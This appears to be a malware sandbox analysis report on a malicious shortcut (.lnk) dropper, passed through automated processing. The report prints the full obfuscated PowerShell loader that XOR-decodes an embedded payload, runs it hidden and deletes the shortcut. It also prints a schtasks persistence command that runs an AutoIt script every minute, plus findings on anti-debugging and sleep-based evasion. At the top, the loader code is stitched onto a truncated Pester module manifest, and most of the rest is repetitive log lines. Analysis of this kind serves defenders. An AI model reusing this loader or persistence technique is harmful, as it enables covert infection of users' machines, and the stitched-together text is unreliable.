vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\knfv5ivjev.lnk

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3969	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4086	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1522

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	API coverage: 8.4 %
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	API coverage: 8.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 3969 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 4086 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep count: 5279 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 1522 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep time: -2767011611056431s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: GSlLzFnTov.exe, 0000000E.00000003.1503111107.0000022C409E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00007FF7F1DEB8E4

Contains functionality to dynamically determine API calls

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,

8_2_00007FF7F1DB1D84

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEBA8C SetUnhandledExceptionFilter,	8_2_00007FF7F1DEBA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7F1DEB8E4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF7F1DEAFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9BA8C SetUnhandledExceptionFilter,	12_2_00007FF700E9BA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF700E9AFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9B8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF700E9B8E4

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov	Jump to behavior
